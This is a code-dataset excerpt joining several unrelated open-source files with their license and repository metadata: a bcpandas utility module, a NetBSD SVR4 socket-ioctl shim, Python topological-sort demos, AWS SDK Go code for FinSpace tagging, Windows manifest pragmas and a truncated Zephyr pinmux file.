    alphabet = string.ascii_letters + string.digits
    basename = "".join(random.choices(alphabet, k=21))
    return os.path.join(tempfile.gettempdir(), basename)
def _escape(input_string: str) -> str:
"""
Adopted from https://github.com/titan550/bcpy/blob/master/bcpy/format_file_builder.py#L25
"""
return (
input_string.replace('"', '\\"')
.replace("'", "\\'")
.replace("\r", "\\r")
.replace("\n", "\\n")
)
def build_format_file(
    df: pd.DataFrame, delimiter: str, db_cols_order: Optional[Dict[str, int]] = None
) -> str:
    """
    Creates the non-xml SQL format file. Puts 4 spaces between each section.
    See https://docs.microsoft.com/en-us/sql/relational-databases/import-export/non-xml-format-files-sql-server
    for the specification of the file.

    # TODO add params/options to control:
    #   - the char type (not just SQLCHAR),

    Parameters
    ----------
    df : pandas DataFrame
    delimiter : a valid delimiter character
    db_cols_order : dict, optional
        Dict of {database column name -> ordinal position of the column}.
        Maps existing columns in the database to their ordinal position, i.e. the order of the columns in the db table.
        1-indexed, so the first columns is 1, second is 2, etc.
        Only needed if the order of the columns in the dataframe doesn't match the database.

    Returns
    -------
    A string containing the format file
    """
    _space = " " * 4
    format_file_str = f"9.0\n{len(df.columns)}\n"  # Version and Number of columns
    for col_num, col_name in enumerate(df.columns, start=1):
        # last col gets a newline sep
        _delim = delimiter if col_num != len(df.columns) else NEWLINE
        # one format-file row per column, fields separated by 4 spaces
        _line = _space.join(
            [
                str(col_num),  # Host file field order
                SQLCHAR,  # Host file data type
                str(0),  # Prefix length
                str(0),  # Host file data length
                f'"{_escape(_delim)}"',  # Terminator (see note below)
                str(
                    col_num if not db_cols_order else db_cols_order[str(col_name)]
                ),  # Server column order
                str(col_name),  # Server column name, optional as long as not blank
                sql_collation,  # Column collation
                "\n",
            ]
        )
        format_file_str += _line
    # FYI very important to surround the Terminator with quotes, otherwise BCP fails with:
    # "Unexpected EOF encountered in BCP data-file". Hugely frustrating bug.
    return format_file_str
def quote_this(this: str, skip: bool = False) -> str:
    """
    OS-safe way to quote a string.

    Returns the string with quotes around it on Linux (via shlex);
    on Windows quoting is skipped entirely.
    Non-string values are returned unchanged.
    """
    if not isinstance(this, str):
        return this
    # NOTE: `skip` is accepted but unused, matching the original contract.
    if IS_WIN32:
        return this  # TODO maybe change?
    return shlex.quote(this)
def run_cmd(cmd: List[str]) -> int:
    """
    Runs the given command.

    Prints STDOUT in real time, prints STDERR when command is complete,
    and logs both STDOUT and STDERR.

    Parameters
    ----------
    cmd : list of str
        The command to run, to be submitted to `subprocess.Popen()`

    Returns
    -------
    The exit code of the command
    """
    if IS_WIN32:
        with_shell = False
    else:
        # POSIX runs through the shell, which expects a single string.
        with_shell = True
        cmd = " ".join(cmd)  # type: ignore
    proc = Popen(
        cmd,
        stdout=PIPE,
        stderr=PIPE,
        encoding="utf-8",
        # Bug fix: was errors="utf-8", which is not a registered error
        # handler and raises LookupError on the first undecodable byte.
        errors="replace",
        shell=with_shell,
    )
    # live stream STDOUT
    # NOTE(review): stderr is only drained after stdout closes; a child that
    # fills the stderr pipe buffer could block — confirm with real workloads.
    while True:
        outs = proc.stdout.readline()
        if outs:
            print(outs, end="")
            logger.info(outs)
        if proc.poll() is not None and outs == "":
            break
    errs = proc.stderr.readlines()
    if errs:
        print(errs, end="")
        logger.error(errs)
    return proc.returncode
|
Python
|
MIT
|
alon-r/bcpandas/bcpandas/utils.py
|
a376a2b1-d5b8-4f05-95c8-5740f7f41cab
|
[{"tag": "USERNAME", "value": "ydima", "start": 74, "end": 79, "context": "\"\"\"\nCreated on Sat Aug 3 23:07:15 2019\n\n@author: ydima\n\"\"\"\n\nimport logging\nimport os\nfrom pathlib import"}]
|
[{"tag": "USERNAME", "value": "ydima", "start": 74, "end": 79, "context": "\"\"\"\nCreated on Sat Aug 3 23:07:15 2019\n\n@author: ydima\n\"\"\"\n\nimport logging\nimport os\nfrom pathlib import"}]
|
/* $NetBSD: svr4_32_sockio.c,v 1.2.10.1 2002/07/22 14:53:27 lukem Exp $ */
/*-
* Copyright (c) 1995 The NetBSD Foundation, Inc.
* All rights reserved.
*
* This code is derived from software contributed to The NetBSD Foundation
* by Christos Zoulas.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the NetBSD
* Foundation, Inc. and its contributors.
* 4. Neither the name of The NetBSD Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
* ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <sys/cdefs.h>
__KERNEL_RCSID(0, "$NetBSD: svr4_32_sockio.c,v 1.2.10.1 2002/07/22 14:53:27 lukem Exp $");
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/systm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/ioctl.h>
#include <sys/termios.h>
#include <sys/tty.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <net/if.h>
#include <sys/malloc.h>
#include <sys/syscallargs.h>
#include <compat/svr4_32/svr4_32_types.h>
#include <compat/svr4_32/svr4_32_util.h>
#include <compat/svr4_32/svr4_32_signal.h>
#include <compat/svr4_32/svr4_32_lwp.h>
#include <compat/svr4_32/svr4_32_ucontext.h>
#include <compat/svr4_32/svr4_32_syscallargs.h>
#include <compat/svr4_32/svr4_32_stropts.h>
#include <compat/svr4_32/svr4_32_ioctl.h>
#include <compat/svr4_32/svr4_32_sockio.h>
static int bsd_to_svr4_flags __P((int));
#define bsd_to_svr4_flag(a) \
if (bf & __CONCAT(I,a)) sf |= __CONCAT(SVR4_I,a)
/*
 * Translate a BSD interface-flags word into its SVR4 equivalent.
 * The bsd_to_svr4_flag() macro (defined above) pastes tokens: it tests
 * bit I##a in `bf' and, when set, ORs SVR4_I##a into `sf'.
 */
static int
bsd_to_svr4_flags(bf)
	int bf;
{
	int sf = 0;	/* accumulated SVR4 flag word */
	bsd_to_svr4_flag(FF_UP);
	bsd_to_svr4_flag(FF_BROADCAST);
	bsd_to_svr4_flag(FF_DEBUG);
	bsd_to_svr4_flag(FF_LOOPBACK);
	bsd_to_svr4_flag(FF_POINTOPOINT);
	bsd_to_svr4_flag(FF_NOTRAILERS);
	bsd_to_svr4_flag(FF_RUNNING);
	bsd_to_svr4_flag(FF_NOARP);
	bsd_to_svr4_flag(FF_PROMISC);
	bsd_to_svr4_flag(FF_ALLMULTI);
	bsd_to_svr4_flag(FF_MULTICAST);
	return sf;
}
/*
 * Handle socket ioctls issued by a 32-bit SVR4 binary: translate the
 * SVR4 request and its argument layout, invoke the file's native
 * fo_ioctl handler where needed, and convert results back for copyout.
 */
int
svr4_32_sock_ioctl(fp, p, retval, fd, cmd, data)
	struct file *fp;
	struct proc *p;
	register_t *retval;
	int fd;
	u_long cmd;
	caddr_t data;
{
	int error;
	/* native ioctl entry point for this open file */
	int (*ctl) __P((struct file *, u_long, caddr_t, struct proc *)) =
	    fp->f_ops->fo_ioctl;

	*retval = 0;

	switch (cmd) {
	case SVR4_SIOCGIFNUM:
		{
			struct ifnet *ifp;
			struct ifaddr *ifa;
			int ifnum = 0;

			/*
			 * This does not return the number of physical
			 * interfaces (if_index), but the number of interfaces
			 * + addresses like ifconf() does, because this number
			 * is used by code that will call SVR4_SIOCGIFCONF to
			 * find the space needed for SVR4_SIOCGIFCONF. So we
			 * count the number of ifreq entries that the next
			 * SVR4_SIOCGIFCONF will return. Maybe a more correct
			 * fix is to make SVR4_SIOCGIFCONF return only one
			 * entry per physical interface?
			 */
			for (ifp = ifnet.tqh_first;
			     ifp != 0; ifp = ifp->if_list.tqe_next)
				/* an address-less interface still counts once */
				if ((ifa = ifp->if_addrlist.tqh_first) == NULL)
					ifnum++;
				else
					for (;ifa != NULL;
					    ifa = ifa->ifa_list.tqe_next)
						ifnum++;

			DPRINTF(("SIOCGIFNUM %d\n", ifnum));
			return copyout(&ifnum, data, sizeof(ifnum));
		}

	case SVR4_32_SIOCGIFFLAGS:
		{
			struct ifreq br;
			struct svr4_32_ifreq sr;

			/* copy in the SVR4 request, query the native flags,
			 * then translate the flag bits back to SVR4 form */
			if ((error = copyin(data, &sr, sizeof(sr))) != 0)
				return error;
			(void) strncpy(br.ifr_name, sr.svr4_ifr_name,
			    sizeof(br.ifr_name));

			if ((error = (*ctl)(fp, SIOCGIFFLAGS,
			    (caddr_t) &br, p)) != 0) {
				DPRINTF(("SIOCGIFFLAGS %s: error %d\n",
				    sr.svr4_ifr_name, error));
				return error;
			}

			sr.svr4_ifr_flags = bsd_to_svr4_flags(br.ifr_flags);
			DPRINTF(("SIOCGIFFLAGS %s = %x\n",
			    sr.svr4_ifr_name, sr.svr4_ifr_flags));
			return copyout(&sr, data, sizeof(sr));
		}

	case SVR4_32_SIOCGIFCONF:
		{
			struct svr4_32_ifconf sc;
			struct ifconf ifc;

			if ((error = copyin(data, &sc, sizeof(sc))) != 0)
				return error;

			DPRINTF(("ifreq %ld svr4_32_ifreq %ld ifc_len %d\n",
			    (unsigned long)sizeof(struct ifreq),
			    (unsigned long)sizeof(struct svr4_32_ifreq),
			    sc.svr4_32_ifc_len));

			/* hand the user's buffer straight to the native
			 * OSIOCGIFCONF, which fills it in place */
			ifc.ifc_len = sc.svr4_32_ifc_len;
			ifc.ifc_buf = (caddr_t)(uintptr_t)sc.ifc_ifcu.ifcu_buf;

			if ((error = (*ctl)(fp, OSIOCGIFCONF,
			    (caddr_t) &ifc, p)) != 0)
				return error;

			/* NOTE(review): the updated ifc.ifc_len is never
			 * copied back into the user's svr4_32_ifconf —
			 * confirm whether callers rely on it. */
			DPRINTF(("SIOCGIFCONF\n"));
			return 0;
		}

	default:
		DPRINTF(("Unknown svr4_32 sockio %lx\n", cmd));
		return 0;	/* ENOSYS really */
	}
}
|
C
|
BSD-3-Clause
|
MarginC/kame/netbsd/sys/compat/svr4_32/svr4_32_sockio.c
|
5891005a-bb7c-4509-b93c-5d5b3490e249
|
[{"tag": "NAME", "value": "Christos Zoulas", "start": 239, "end": 254, "context": "ftware contributed to The NetBSD Foundation\n * by Christos Zoulas.\n *\n * Redistribution and use in source and binar"}]
|
[{"tag": "NAME", "value": "Christos Zoulas", "start": 239, "end": 254, "context": "ftware contributed to The NetBSD Foundation\n * by Christos Zoulas.\n *\n * Redistribution and use in source and binar"}]
|
#---------------------------------------------------------------
# ALGORITHM DEMO : TOPLOGICAL SORT
#---------------------------------------------------------------
# Topological Sort is a algorithm can find "ordering" on an "order dependency" graph
# Concept
# https://blog.techbridge.cc/2020/05/10/leetcode-topological-sort/
# https://alrightchiu.github.io/SecondRound/graph-li-yong-dfsxun-zhao-dagde-topological-sorttuo-pu-pai-xu.html
# V0
# IDEA : implement topologicalSortUtil, topologicalSort, and addEdge methods
# step 1) maintain a stack, save "ordering" nodes in it (and return in final step)
# step 2) init visited as [False]*self.V (all nodes are NOT visited yet)
# step 3) iterate over all vertices in graph, if not visited, then run topologicalSortUtil
# step 4) return result (stack)
from collections import defaultdict
class Graph:
    """Directed graph with a DFS-based topological sort (V0 variant)."""

    def __init__(self, vertices):
        # adjacency list: node -> list of successor nodes
        self.graph = defaultdict(list)
        self.V = vertices

    # for building the graph
    def addEdge(self, u, v):
        self.graph[u].append(v)

    def topologicalSortUtil(self, v, visited, stack):
        """DFS from v; prepend v to stack once all its successors are done."""
        visited[v] = True
        for nxt in self.graph[v]:
            if not visited[nxt]:
                self.topologicalSortUtil(nxt, visited, stack)
        # prepend so v lands in front of everything finished before it
        stack.insert(0, v)

    def topologicalSort(self):
        """Run DFS from every unvisited vertex; return the order reversed."""
        visited = [False] * self.V
        ordering = []
        for node in range(self.V):
            if not visited[node]:
                self.topologicalSortUtil(node, visited, ordering)
        # return the result in inverse order
        return ordering[::-1]
### TEST
# Label legend only: this bare dict expression is a no-op reminder that
# vertex 0 stands for "A", 1 for "B", 2 for "C", 3 for "D".
{"A": 0, "B":1, "C":2, "D": 3}
v = 4
g = Graph(v)
# edges: 0->1, 0->2, 2->3, 3->1
g.addEdge(0, 1)
g.addEdge(0, 2)
g.addEdge(2, 3)
g.addEdge(3, 1)
print (g.graph)
# ans should be TableB, TableD, TableC, TableA.
r = g.topologicalSort()
print (r)
# V0'
from collections import defaultdict
class Graph:
    """Directed graph with a DFS-based topological sort (V0' variant)."""

    def __init__(self, v):
        self.graph = defaultdict(list)  # node -> successors
        self.v = v  # number of vertices

    def addEdge(self, a, b):
        self.graph[a].append(b)

    def topologicalSortUtil(self, x, visited, stack):
        """DFS helper: marks x visited AFTER all successors are processed."""
        # already handled: nothing to do
        if visited[x]:
            return
        # recurse into every successor; each call re-checks visited itself
        for nxt in self.graph[x]:
            self.topologicalSortUtil(nxt, visited, stack)
        visited[x] = True
        stack.insert(0, x)

    def topologicalSort(self):
        """DFS from all unvisited vertices; prints the stack, returns it reversed."""
        visited = [False] * self.v
        stack = []
        for node in range(self.v):
            if not visited[node]:
                self.topologicalSortUtil(node, visited, stack)
        print ("stack = " + str(stack))
        return stack[::-1]
# V0''
# IDEA : implement topologicalSortUtil, topologicalSort, and addEdge methods
from collections import defaultdict
class Graph:
    """Directed graph with a DFS topological sort that prints its result (V0'')."""

    def __init__(self, vertices):
        self.graph = defaultdict(list)  # adjacency list
        self.V = vertices

    # for testing (build graph)
    def addEdge(self, u, v):
        self.graph[u].append(v)

    def topologicalSortUtil(self, v, visited, stack):
        """DFS from v, prepending v to stack after its successors finish."""
        visited[v] = True
        for nxt in self.graph[v]:
            if not visited[nxt]:
                self.topologicalSortUtil(nxt, visited, stack)
        stack.insert(0, v)

    def topologicalSort(self):
        """Prints the computed ordering; returns None."""
        visited = [False] * self.V
        result = []
        for node in range(self.V):
            if not visited[node]:
                self.topologicalSortUtil(node, visited, result)
        print (result)
# V1
# https://www.geeksforgeeks.org/topological-sorting/
# Python program to print topological sorting of a DAG
from collections import defaultdict
class Graph:
    """Directed graph; geeksforgeeks-style DFS topological sort (V1)."""

    def __init__(self, vertices):
        self.graph = defaultdict(list)  # dictionary containing adjacency List
        self.V = vertices  # No. of vertices

    # function to add an edge to graph
    def addEdge(self, u, v):
        self.graph[u].append(v)

    # A recursive function used by topologicalSort
    def topologicalSortUtil(self, v, visited, stack):
        # Mark the current node as visited, then finish all successors first.
        visited[v] = True
        for nxt in self.graph[v]:
            if not visited[nxt]:
                self.topologicalSortUtil(nxt, visited, stack)
        # Prepend the finished vertex to the result stack.
        stack.insert(0, v)

    # The function to do Topological Sort. It uses recursive
    # topologicalSortUtil()
    def topologicalSort(self):
        """Prints the ordering (stack reversed); returns None."""
        visited = [False] * self.V
        stack = []
        # DFS from every vertex not yet reached
        for node in range(self.V):
            if not visited[node]:
                self.topologicalSortUtil(node, visited, stack)
        print(stack[::-1])  # return list in reverse order
# TEST
# Driver Code
# g = Graph(6)
# g.addEdge(5, 2)
# g.addEdge(5, 0)
# g.addEdge(4, 0)
# g.addEdge(4, 1)
# g.addEdge(2, 3)
# g.addEdge(3, 1)
#
# print ("Following is a Topological Sort of the given graph")
#
# # Function Call
# g.topologicalSort()
# V1
# https://github.com/TheAlgorithms/Python/blob/master/sorts/topological_sort.py
"""Topological Sort."""
# a
# / \
# b c
# / \
# d e
# edges = {"a": ["c", "b"], "b": ["d", "e"], "c": [], "d": [], "e": []}
# vertices = ["a", "b", "c", "d", "e"]
class Graph:
    """DFS topological sort driven by module-level ``edges``/``vertices``.

    NOTE(review): this method reads the module-level ``edges`` dict and
    ``vertices`` list rather than instance state — confirm callers define
    both before invoking it.
    """

    def topological_sort(self, start, visited, sort):
        """Perform topological sort on a directed acyclic graph."""
        current = start
        # add current to visited
        visited.append(current)
        neighbors = edges[current]
        for neighbor in neighbors:
            # if neighbor not in visited, visit
            if neighbor not in visited:
                # Bug fix: the original called bare `topological_sort(...)`,
                # which raises NameError inside a method; dispatch via self.
                sort = self.topological_sort(neighbor, visited, sort)
        # if all neighbors visited add current to sort
        sort.append(current)
        # if all vertices haven't been visited select a new one to visit
        if len(visited) != len(vertices):
            for vertice in vertices:
                if vertice not in visited:
                    sort = self.topological_sort(vertice, visited, sort)
        # return sort
        return sort
# TEST
# edges = {"a": ["c", "b"], "b": ["d", "e"], "c": [], "d": [], "e": []}
# vertices = ["a", "b", "c", "d", "e"]
# sort = topological_sort("a", [], [])
# print(sort)
# V1'
# http://www.runoob.com/python3/python-topological-sorting.html
class Graph:
    # Kept in the class body as in the original (binds Graph.defaultdict);
    # __init__ still resolves `defaultdict` from the module scope.
    from collections import defaultdict

    def __init__(self, vertices):
        self.graph = defaultdict(list)  # adjacency list
        self.V = vertices

    def addEdge(self, u, v):
        self.graph[u].append(v)

    def topologicalSortUtil(self, v, visited, stack):
        """DFS from v; prepend v after all its successors are finished."""
        visited[v] = True
        for nxt in self.graph[v]:
            if not visited[nxt]:
                self.topologicalSortUtil(nxt, visited, stack)
        stack.insert(0, v)

    def topologicalSort(self):
        """Prints the computed ordering; returns None."""
        visited = [False] * self.V
        result = []
        for node in range(self.V):
            if not visited[node]:
                self.topologicalSortUtil(node, visited, result)
        print (result)
# TEST
# g= Graph(6)
# g.addEdge(5, 2);
# g.addEdge(5, 0);
# g.addEdge(4, 0);
# g.addEdge(4, 1);
# g.addEdge(2, 3);
# g.addEdge(3, 1);
# print ("output of Topological Sort ")
# g.topologicalSort()
# [5, 4, 2, 3, 1, 0]
# V2
# https://zhuanlan.zhihu.com/p/69858335
def topoSort(graph):
    """Kahn's-algorithm topological sort.

    graph maps node -> iterable of successors. Returns the ordering as a
    list, or None if the graph contains a cycle.
    """
    # in-degree of every node, initialised to 0
    indeg = {node: 0 for node in graph}
    total = len(indeg)
    for node in graph:
        for succ in graph[node]:
            indeg[succ] += 1
    # nodes currently at in-degree zero; used as a LIFO stack (list.pop())
    ready = [node for node in indeg if indeg[node] == 0]
    order = []
    while ready:
        node = ready.pop()
        order.append(node)
        for succ in graph[node]:
            indeg[succ] -= 1
            if indeg[succ] == 0:
                ready.append(succ)
    # leftover nodes mean a cycle
    return order if len(order) == total else None
# TEST
# G = {
# 'a':'bf',
# 'b':'cdf',
# 'c':'d',
# 'd':'ef',
# 'e':'f',
# 'f':''
# }
# print(topoSort(G))
# ['a', 'b', 'c', 'd', 'e', 'f']
# V3
# https://www.educative.io/courses/grokking-the-coding-interview/m25rBmwLV00
from collections import deque
def topological_sort(vertices, edges):
    """Kahn's algorithm over vertices 0..vertices-1.

    edges is a sequence of [parent, child] pairs. Returns the ordering as a
    list, or [] when vertices <= 0 or the graph contains a cycle.
    """
    sortedOrder = []
    if vertices <= 0:
        return sortedOrder

    # a+b. Build adjacency list and in-degree table.
    inDegree = {i: 0 for i in range(vertices)}
    graph = {i: [] for i in range(vertices)}
    for edge in edges:
        parent, child = edge[0], edge[1]
        graph[parent].append(child)
        inDegree[child] += 1

    # c. Seed the queue with every zero-in-degree vertex (FIFO order).
    sources = deque(key for key in inDegree if inDegree[key] == 0)

    # d. Repeatedly emit a source and release its children.
    while sources:
        vertex = sources.popleft()
        sortedOrder.append(vertex)
        for child in graph[vertex]:
            inDegree[child] -= 1
            if inDegree[child] == 0:
                sources.append(child)

    # topological sort is not possible when a cycle left vertices unemitted
    return sortedOrder if len(sortedOrder) == vertices else []
# TEST
# def main():
# print("Topological sort: " +
# str(topological_sort(4, [[3, 2], [3, 0], [2, 0], [2, 1]])))
# print("Topological sort: " +
# str(topological_sort(5, [[4, 2], [4, 3], [2, 0], [2, 1], [3, 1]])))
# print("Topological sort: " +
# str(topological_sort(7, [[6, 4], [6, 2], [5, 3], [5, 4], [3, 0], [3, 1], [3, 2], [4, 1]])))
#main()
|
Python
|
Unlicense
|
yennanliu/Python_basics/algorithm/python/topological_sort.py
|
8ef4c182-0451-4f58-9cb8-a43882a28ac3
|
[]
|
[]
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package finspace
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Adds metadata tags to a FinSpace resource.
func (c *Client) TagResource(ctx context.Context, params *TagResourceInput, optFns ...func(*Options)) (*TagResourceOutput, error) {
	if params == nil {
		params = &TagResourceInput{}
	}

	// invokeOperation drives the middleware stack assembled by
	// addOperationTagResourceMiddlewares below.
	result, metadata, err := c.invokeOperation(ctx, "TagResource", params, optFns, addOperationTagResourceMiddlewares)
	if err != nil {
		return nil, err
	}

	out := result.(*TagResourceOutput)
	out.ResultMetadata = metadata
	return out, nil
}
type TagResourceInput struct {

	// The Amazon Resource Name (ARN) for the resource.
	//
	// This member is required.
	ResourceArn *string

	// One or more tags to be assigned to the resource.
	//
	// This member is required.
	Tags map[string]string
}

// TagResourceOutput carries no response fields beyond the operation metadata.
type TagResourceOutput struct {
	// Metadata pertaining to the operation's result.
	ResultMetadata middleware.Metadata
}
// addOperationTagResourceMiddlewares assembles the full middleware stack for
// the TagResource operation: REST-JSON (de)serialization, logging, request
// IDs, retries, SigV4 signing, input validation, and response handling.
// The first registration error aborts setup.
func addOperationTagResourceMiddlewares(stack *middleware.Stack, options Options) (err error) {
	// request serialization / response deserialization
	err = stack.Serialize.Add(&awsRestjson1_serializeOpTagResource{}, middleware.After)
	if err != nil {
		return err
	}
	err = stack.Deserialize.Add(&awsRestjson1_deserializeOpTagResource{}, middleware.After)
	if err != nil {
		return err
	}
	// client plumbing: logging, request IDs, content length, endpoint resolution
	if err = addSetLoggerMiddleware(stack, options); err != nil {
		return err
	}
	if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
		return err
	}
	if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
		return err
	}
	if err = addResolveEndpointMiddleware(stack, options); err != nil {
		return err
	}
	// SigV4 signing and retry behaviour
	if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
		return err
	}
	if err = addRetryMiddlewares(stack, options); err != nil {
		return err
	}
	if err = addHTTPSignerV4Middleware(stack, options); err != nil {
		return err
	}
	if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
		return err
	}
	if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
		return err
	}
	if err = addClientUserAgent(stack); err != nil {
		return err
	}
	if err = addRestJsonContentTypeCustomization(stack); err != nil {
		return err
	}
	if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
		return err
	}
	if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
		return err
	}
	// reject requests missing required input members before they are sent
	if err = addOpTagResourceValidationMiddleware(stack); err != nil {
		return err
	}
	if err = stack.Initialize.Add(newServiceMetadataMiddleware_opTagResource(options.Region), middleware.Before); err != nil {
		return err
	}
	if err = addRequestIDRetrieverMiddleware(stack); err != nil {
		return err
	}
	if err = addResponseErrorMiddleware(stack); err != nil {
		return err
	}
	if err = addRequestResponseLogging(stack, options); err != nil {
		return err
	}
	return nil
}
// newServiceMetadataMiddleware_opTagResource tags the request with the
// service/operation identity used for signing and endpoint resolution.
func newServiceMetadataMiddleware_opTagResource(region string) *awsmiddleware.RegisterServiceMetadata {
	return &awsmiddleware.RegisterServiceMetadata{
		Region:        region,
		ServiceID:     ServiceID,
		SigningName:   "finspace",
		OperationName: "TagResource",
	}
}
|
GO
|
Apache-2.0
|
BrandonRoehl/aws-sdk-go-v2/service/finspace/api_op_TagResource.go
|
36cf4341-3790-478b-b451-44867dcc4c5a
|
[]
|
[]
|
// stdafx.cpp : source file that includes just the standard includes
// App.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// Embed a side-by-side manifest dependency on the Windows Common Controls
// v6 assembly (Microsoft.Windows.Common-Controls), selecting the
// processorArchitecture that matches the current compilation target so the
// application gets themed (v6) controls at runtime.
#if defined _M_IX86
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_IA64
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='ia64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_X64
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#else
#pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#endif
|
C++
|
MIT
|
4198222025/duilib/ExeDocker/StdAfx.cpp
|
8a40b8d9-96b4-49bc-a5d7-7d8c15f9a352
|
[{"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 1022, "end": 1038, "context": ".0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#endif\n"}, {"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 378, "end": 394, "context": ".0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_IA64\n#pragma c"}, {"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 599, "end": 615, "context": "0.0' processorArchitecture='ia64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_X64\n#pragma co"}, {"tag": "API_KEY", "value": "6595b64144ccf1df", "start": 820, "end": 836, "context": ".0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#else\n#pragma comment(linker, \""}]
|
[{"tag": "KEY", "value": "6595b64144ccf1df", "start": 1022, "end": 1038, "context": ".0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#endif\n"}, {"tag": "KEY", "value": "6595b64144ccf1df", "start": 378, "end": 394, "context": ".0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_IA64\n#pragma c"}, {"tag": "KEY", "value": "6595b64144ccf1df", "start": 599, "end": 615, "context": "0.0' processorArchitecture='ia64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#elif defined _M_X64\n#pragma co"}, {"tag": "KEY", "value": "6595b64144ccf1df", "start": 820, "end": 836, "context": ".0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\\\"\")\n#else\n#pragma comment(linker, \""}]
|
/*
* Copyright (c) 2018, Diego Sueiro <diego.sueiro@gmail.com>
*
* SPDX-License-Identifier: Apache-2.0
*/
#include <init.h>
#include "device_imx.h"
/*
 * Pin multiplexing for the Colibri iMX7D Cortex-M4 board.
 *
 * For each peripheral node enabled in the devicetree, program the matching
 * i.MX7 IOMUXC mux-control (signal routing) and pad-control (electrical
 * configuration) registers.  Registered via SYS_INIT to run once at
 * PRE_KERNEL_1.  Always returns 0.
 */
static int colibri_imx7d_m4_pinmux_init(struct device *dev)
{
	ARG_UNUSED(dev);

#if DT_NODE_HAS_STATUS(DT_NODELABEL(gpio1), okay)
	/* GPIO1_IO02 Mux Config */
	IOMUXC_LPSR_SW_MUX_CTL_PAD_GPIO1_IO02 = 0;
	IOMUXC_LPSR_SW_PAD_CTL_PAD_GPIO1_IO02 = 0;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(gpio2), okay)
	/* GPIO2_IO26 Mux Config: EPDC_GDRL pad to mux mode 5 */
	IOMUXC_SW_MUX_CTL_PAD_EPDC_GDRL = 5;
	IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL =
		IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL_PS(2) |
		IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL_PE_MASK |
		IOMUXC_SW_PAD_CTL_PAD_EPDC_GDRL_HYS_MASK;
#endif

#if DT_NODE_HAS_STATUS(DT_NODELABEL(uart2), okay)
	/* UART2 RX/TX pads: mux mode 0, pull/hysteresis enabled */
	IOMUXC_SW_MUX_CTL_PAD_UART2_RX_DATA =
		IOMUXC_SW_MUX_CTL_PAD_UART2_RX_DATA_MUX_MODE(0);
	IOMUXC_SW_MUX_CTL_PAD_UART2_TX_DATA =
		IOMUXC_SW_MUX_CTL_PAD_UART2_TX_DATA_MUX_MODE(0);

	IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA =
		IOMUXC_SW_PAD_CTL_PAD_UART2_RX_DATA_PE_MASK |
